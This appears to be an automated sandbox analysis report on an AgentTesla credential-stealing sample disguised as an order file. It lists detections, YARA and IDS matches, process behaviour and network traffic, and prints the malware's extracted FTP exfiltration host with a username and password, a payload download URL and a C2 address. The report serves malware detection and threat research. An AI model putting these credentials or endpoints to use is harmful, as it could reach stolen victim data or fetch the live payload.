Windows Analysis Report
GEFA-Order 232343-68983689.exe

Overview

General Information

Sample name: GEFA-Order 232343-68983689.exe
Analysis ID: 1529933
MD5: 7edaa96c807197b45ffb4f442ab3bfaa
SHA1: a87db0d82f05e80b4511667c01305993d9265806
SHA256: 359c1e634d4b0d664443dca2ef11d6f5d68dcd381d56845e9212766b8b67e64f
Tags: exe, SPAM-ITA, user-JAMESWT_MHT

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • GEFA-Order 232343-68983689.exe (PID: 7416 cmdline: "C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe" MD5: 7EDAA96C807197B45FFB4F442AB3BFAA)
    • InstallUtil.exe (PID: 7544 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • Fqhnalw.exe (PID: 7784 cmdline: "C:\Users\user\AppData\Roaming\Fqhnalw.exe" MD5: 7EDAA96C807197B45FFB4F442AB3BFAA)
    • InstallUtil.exe (PID: 7872 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • Fqhnalw.exe (PID: 7972 cmdline: "C:\Users\user\AppData\Roaming\Fqhnalw.exe" MD5: 7EDAA96C807197B45FFB4F442AB3BFAA)
    • InstallUtil.exe (PID: 8048 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.alternatifplastik.com", "Username": "fgghv@alternatifplastik.com", "Password": "Fineboy777@"}
Source: dump.pcap, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security

Source: 00000007.00000002.2583924445.00000000031E7000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 00000006.00000002.1677808724.00000000042BC000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: 00000006.00000002.1677808724.00000000042BC000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 00000005.00000002.1655327124.00000000033BC000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: 00000005.00000002.1655327124.00000000033BC000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security

Source: 0.2.GEFA-Order 232343-68983689.exe.6ea0000.11.raw.unpack, Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Author: Joe Security
Source: 0.2.GEFA-Order 232343-68983689.exe.44359f8.5.raw.unpack, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: 0.2.GEFA-Order 232343-68983689.exe.44359f8.5.raw.unpack, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 0.2.GEFA-Order 232343-68983689.exe.44359f8.5.raw.unpack, Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen, Strings:
                    • 0x33061:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                    • 0x330d3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                    • 0x3315d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                    • 0x331ef:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                    • 0x33259:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                    • 0x332cb:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                    • 0x33361:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                    • 0x333f1:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Source: 0.2.GEFA-Order 232343-68983689.exe.44359f8.5.raw.unpack, Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Author: ditekSHen, Strings:
                    • 0x3047c:$s2: GetPrivateProfileString
                    • 0x2fb9d:$s3: get_OSFullName
                    • 0x3118e:$s5: remove_Key
                    • 0x3136c:$s5: remove_Key
                    • 0x3227a:$s6: FtpWebRequest
                    • 0x33043:$s7: logins
                    • 0x335b5:$s7: logins
                    • 0x362ba:$s7: logins
                    • 0x36378:$s7: logins
                    • 0x37c7e:$s7: logins
                    • 0x36f1c:$s9: 1.85 (Hash, version 2, native byte-order)

                    System Summary

Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Fqhnalw.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe, ProcessId: 7416, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Fqhnalw

Timestamp: 2024-10-09T15:01:45.449007+0200, SID: 2029927, Severity: 1, Classtype: A Network Trojan was detected, Source: 192.168.2.9:49766, Destination: 5.2.84.236:21, Protocol: TCP
Timestamp: 2024-10-09T15:02:02.253420+0200, SID: 2029927, Severity: 1, Classtype: A Network Trojan was detected, Source: 192.168.2.9:49853, Destination: 5.2.84.236:21, Protocol: TCP
Timestamp: 2024-10-09T15:02:10.076009+0200, SID: 2029927, Severity: 1, Classtype: A Network Trojan was detected, Source: 192.168.2.9:49894, Destination: 5.2.84.236:21, Protocol: TCP

Timestamp: 2024-10-09T15:01:46.061718+0200, SID: 2855542, Severity: 1, Classtype: A Network Trojan was detected, Source: 192.168.2.9:49775, Destination: 5.2.84.236:58997, Protocol: TCP
Timestamp: 2024-10-09T15:01:46.068204+0200, SID: 2855542, Severity: 1, Classtype: A Network Trojan was detected, Source: 192.168.2.9:49775, Destination: 5.2.84.236:58997, Protocol: TCP
Timestamp: 2024-10-09T15:02:02.887826+0200, SID: 2855542, Severity: 1, Classtype: A Network Trojan was detected, Source: 192.168.2.9:49865, Destination: 5.2.84.236:63612, Protocol: TCP
Timestamp: 2024-10-09T15:02:02.893477+0200, SID: 2855542, Severity: 1, Classtype: A Network Trojan was detected, Source: 192.168.2.9:49865, Destination: 5.2.84.236:63612, Protocol: TCP
Timestamp: 2024-10-09T15:02:10.692825+0200, SID: 2855542, Severity: 1, Classtype: A Network Trojan was detected, Source: 192.168.2.9:49905, Destination: 5.2.84.236:65429, Protocol: TCP
Timestamp: 2024-10-09T15:02:10.698545+0200, SID: 2855542, Severity: 1, Classtype: A Network Trojan was detected, Source: 192.168.2.9:49905, Destination: 5.2.84.236:65429, Protocol: TCP

                    AV Detection

Source: GEFA-Order 232343-68983689.exe, Avira: detected
Source: C:\Users\user\AppData\Roaming\Fqhnalw.exe, Avira: detection malicious, Label: HEUR/AGEN.1309900
Source: 2.2.InstallUtil.exe.400000.0.unpack, Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.alternatifplastik.com", "Username": "fgghv@alternatifplastik.com", "Password": "Fineboy777@"}
Source: C:\Users\user\AppData\Roaming\Fqhnalw.exe, ReversingLabs: Detection: 31%
Source: GEFA-Order 232343-68983689.exe, ReversingLabs: Detection: 21%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\Fqhnalw.exe, Joe Sandbox ML: detected
Source: GEFA-Order 232343-68983689.exe, Joe Sandbox ML: detected
Source: GEFA-Order 232343-68983689.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 103.191.208.122:443 -> 192.168.2.9:49727 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 103.191.208.122:443 -> 192.168.2.9:49818 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 103.191.208.122:443 -> 192.168.2.9:49870 version: TLS 1.2
Source: GEFA-Order 232343-68983689.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: GEFA-Order 232343-68983689.exe, Fqhnalw.exe (memory dumps)
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: GEFA-Order 232343-68983689.exe (file and memory dumps), Fqhnalw.exe (memory dumps)
Source: Binary string: protobuf-net.pdbSHA256}Lq source: GEFA-Order 232343-68983689.exe (memory dumps)
Source: Binary string: protobuf-net.pdb source: GEFA-Order 232343-68983689.exe (memory dumps)
Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe, Code function: 4x nop then jmp 06F3DDF5h, 0_2_06F3DD70
Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe, Code function: 4x nop then jmp 06F3DDF5h, 0_2_06F3DD60
Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe, Code function: 4x nop then jmp 06F3D59Dh, 0_2_06F3D248
Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe, Code function: 4x nop then jmp 06F3D59Dh, 0_2_06F3D238
Source: C:\Users\user\AppData\Roaming\Fqhnalw.exe, Code function: 4x nop then jmp 06B4DDF5h, 4_2_06B4DD70
Source: C:\Users\user\AppData\Roaming\Fqhnalw.exe, Code function: 4x nop then jmp 06B4DDF5h, 4_2_06B4DD60
Source: C:\Users\user\AppData\Roaming\Fqhnalw.exe, Code function: 4x nop then jmp 06B4D59Dh, 4_2_06B4D238
Source: C:\Users\user\AppData\Roaming\Fqhnalw.exe, Code function: 4x nop then jmp 06B4D59Dh, 4_2_06B4D248
Source: C:\Users\user\AppData\Roaming\Fqhnalw.exe, Code function: 4x nop then jmp 06BCB12Fh, 6_2_06BCAE22
Source: C:\Users\user\AppData\Roaming\Fqhnalw.exe, Code function: 4x nop then jmp 06BEDDF5h, 6_2_06BEDD70
Source: C:\Users\user\AppData\Roaming\Fqhnalw.exe, Code function: 4x nop then jmp 06BEDDF5h, 6_2_06BEDD60
Source: C:\Users\user\AppData\Roaming\Fqhnalw.exe, Code function: 4x nop then jmp 06BED59Dh, 6_2_06BED238
Source: C:\Users\user\AppData\Roaming\Fqhnalw.exe, Code function: 4x nop then jmp 06BED59Dh, 6_2_06BED248

                    Networking

Source: Network traffic, Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.9:49775 -> 5.2.84.236:58997
Source: Network traffic, Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.9:49766 -> 5.2.84.236:21
Source: Network traffic, Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.9:49865 -> 5.2.84.236:63612
Source: Network traffic, Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.9:49853 -> 5.2.84.236:21
Source: Network traffic, Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.9:49894 -> 5.2.84.236:21
Source: Network traffic, Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.9:49905 -> 5.2.84.236:65429
Source: global traffic, TCP traffic: 5.2.84.236 ports 63612,65429,1,58997,2,21
Source: global traffic, TCP traffic: 192.168.2.9:49775 -> 5.2.84.236:58997
Source: global traffic, HTTP traffic detected: GET /manxz/Pqbrsrcnsx.mp4 HTTP/1.1, Host: rubberpartsmanufacturers.com, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /manxz/Pqbrsrcnsx.mp4 HTTP/1.1, Host: rubberpartsmanufacturers.com, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /manxz/Pqbrsrcnsx.mp4 HTTP/1.1, Host: rubberpartsmanufacturers.com, Connection: Keep-Alive
Source: Joe Sandbox View, IP Address: 5.2.84.236
Source: Joe Sandbox View, ASN Name: ALASTYRTR
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown, FTP traffic detected: 5.2.84.236:21 -> 192.168.2.9:49766, server banner:
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 2 of 100 allowed.
220-Local time is now 16:01. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 10 minutes of inactivity.
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, DNS traffic detected: DNS query: rubberpartsmanufacturers.com
Source: global traffic, DNS traffic detected: DNS query: ftp.alternatifplastik.com
Source: InstallUtil.exe (memory dumps), String found in binary or memory: http://ftp.alternatifplastik.com
Source: GEFA-Order 232343-68983689.exe, InstallUtil.exe, Fqhnalw.exe (memory dumps), String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: GEFA-Order 232343-68983689.exe, InstallUtil.exe, Fqhnalw.exe (memory dumps), String found in binary or memory: https://account.dyn.com/
Source: GEFA-Order 232343-68983689.exe (memory dumps), String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: GEFA-Order 232343-68983689.exe (memory dumps), String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: GEFA-Order 232343-68983689.exe (memory dumps), String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: GEFA-Order 232343-68983689.exe, Fqhnalw.exe (memory dumps), String found in binary or memory: https://rubberpartsmanufacturers.com
Source: GEFA-Order 232343-68983689.exe, Fqhnalw.exe (memory dumps), String found in binary or memory: https://rubberpartsmanufacturers.com/manxz/Pqbrsrcnsx.mp4
Source: GEFA-Order 232343-68983689.exe (memory dumps), String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: GEFA-Order 232343-68983689.exe, Fqhnalw.exe (memory dumps), String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: GEFA-Order 232343-68983689.exe (memory dumps), String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: unknown, Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown, Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown, HTTPS traffic detected: 103.191.208.122:443 -> 192.168.2.9:49727 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 103.191.208.122:443 -> 192.168.2.9:49818 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 103.191.208.122:443 -> 192.168.2.9:49870 version: TLS 1.2

                    System Summary

Source: 0.2.GEFA-Order 232343-68983689.exe.44359f8.5.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: 0.2.GEFA-Order 232343-68983689.exe.44359f8.5.raw.unpack, type: UNPACKEDPE, Matched rule: AgenetTesla Type 2 Keylogger payload, Author: ditekSHen
Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: AgenetTesla Type 2 Keylogger payload, Author: ditekSHen
Source: 0.2.GEFA-Order 232343-68983689.exe.44359f8.5.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: 0.2.GEFA-Order 232343-68983689.exe.44359f8.5.unpack, type: UNPACKEDPE, Matched rule: AgenetTesla Type 2 Keylogger payload, Author: ditekSHen
Source: initial sample, Static PE information: Filename: GEFA-Order 232343-68983689.exe
Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe, Code function: 0_2_06F173E0 NtProtectVirtualMemory, 0_2_06F173E0
Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe, Code function: 0_2_06F183B8 NtResumeThread, 0_2_06F183B8
Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe, Code function: 0_2_06F173D8 NtProtectVirtualMemory, 0_2_06F173D8
Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe, Code function: 0_2_06F183B0 NtResumeThread, 0_2_06F183B0
Source: C:\Users\user\AppData\Roaming\Fqhnalw.exe, Code function: 4_2_06B283B8 NtResumeThread, 4_2_06B283B8
Source: C:\Users\user\AppData\Roaming\Fqhnalw.exe, Code function: 4_2_06B273E0 NtProtectVirtualMemory, 4_2_06B273E0
Source: C:\Users\user\AppData\Roaming\Fqhnalw.exe, Code function: 4_2_06B283B0 NtResumeThread, 4_2_06B283B0
Source: C:\Users\user\AppData\Roaming\Fqhnalw.exe, Code function: 4_2_06B273D8 NtProtectVirtualMemory, 4_2_06B273D8
Source: C:\Users\user\AppData\Roaming\Fqhnalw.exe, Code function: 6_2_06BC83B8 NtResumeThread, 6_2_06BC83B8
Source: C:\Users\user\AppData\Roaming\Fqhnalw.exe, Code function: 6_2_06BC73E0 NtProtectVirtualMemory, 6_2_06BC73E0
Source: C:\Users\user\AppData\Roaming\Fqhnalw.exe, Code function: 6_2_06BC83B0 NtResumeThread, 6_2_06BC83B0
Source: C:\Users\user\AppData\Roaming\Fqhnalw.exe, Code function: 6_2_06BC73D8 NtProtectVirtualMemory, 6_2_06BC73D8
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_0724D7980_2_0724D798
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_0724CB280_2_0724CB28
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_0723003D0_2_0723003D
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_072300400_2_07230040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D41902_2_012D4190
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D4A602_2_012D4A60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D9C682_2_012D9C68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012DCF282_2_012DCF28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D3E482_2_012D3E48
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05B3AF182_2_05B3AF18
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05B394082_2_05B39408
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_0131F6B04_2_0131F6B0
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_0131D6C44_2_0131D6C4
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_069E37304_2_069E3730
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_069EE4D04_2_069EE4D0
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_069E5D624_2_069E5D62
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_069E71744_2_069E7174
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_069E9E174_2_069E9E17
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_069E9E284_2_069E9E28
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_069ECF904_2_069ECF90
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_069ED7084_2_069ED708
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_069E37204_2_069E3720
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_069E8C784_2_069E8C78
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_069E8C684_2_069E8C68
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_069E00284_2_069E0028
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_069E00404_2_069E0040
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B242C04_2_06B242C0
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B2A1984_2_06B2A198
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B242B04_2_06B242B0
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B212E04_2_06B212E0
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B212D24_2_06B212D2
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B2A2284_2_06B2A228
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B2A1884_2_06B2A188
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B386904_2_06B38690
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B3C3004_2_06B3C300
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B386864_2_06B38686
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B3C6274_2_06B3C627
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B300064_2_06B30006
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B300404_2_06B30040
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B391104_2_06B39110
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B391004_2_06B39100
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B4FA604_2_06B4FA60
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B4CC304_2_06B4CC30
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B4FA4F4_2_06B4FA4F
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06B4A0F84_2_06B4A0F8
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06BB00064_2_06BB0006
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06BB00404_2_06BB0040
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06C03E084_2_06C03E08
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06C049304_2_06C04930
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06C08ADA4_2_06C08ADA
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06C087474_2_06C08747
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06C03DFB4_2_06C03DFB
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06C0491F4_2_06C0491F
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06E5D7984_2_06E5D798
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06E5CB284_2_06E5CB28
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06E400404_2_06E40040
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 4_2_06E400394_2_06E40039
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_01634A605_2_01634A60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_01639C625_2_01639C62
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0163CF285_2_0163CF28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_01633E485_2_01633E48
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_016341905_2_01634190
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_066956A85_2_066956A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_066900405_2_06690040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06692EE85_2_06692EE8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06693F205_2_06693F20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669BCC05_2_0669BCC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06699A985_2_06699A98
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06698B535_2_06698B53
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669DBF05_2_0669DBF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0669361B5_2_0669361B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06694FC85_2_06694FC8
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_0160F6B06_2_0160F6B0
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_0160D6C46_2_0160D6C4
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_0160F6A26_2_0160F6A2
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06A837306_2_06A83730
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06A8E4D06_2_06A8E4D0
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06A85D626_2_06A85D62
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06A871746_2_06A87174
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06A89E286_2_06A89E28
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06A8CF906_2_06A8CF90
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06A837206_2_06A83720
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeCode function: 6_2_06A8D7086_2_06A8D708
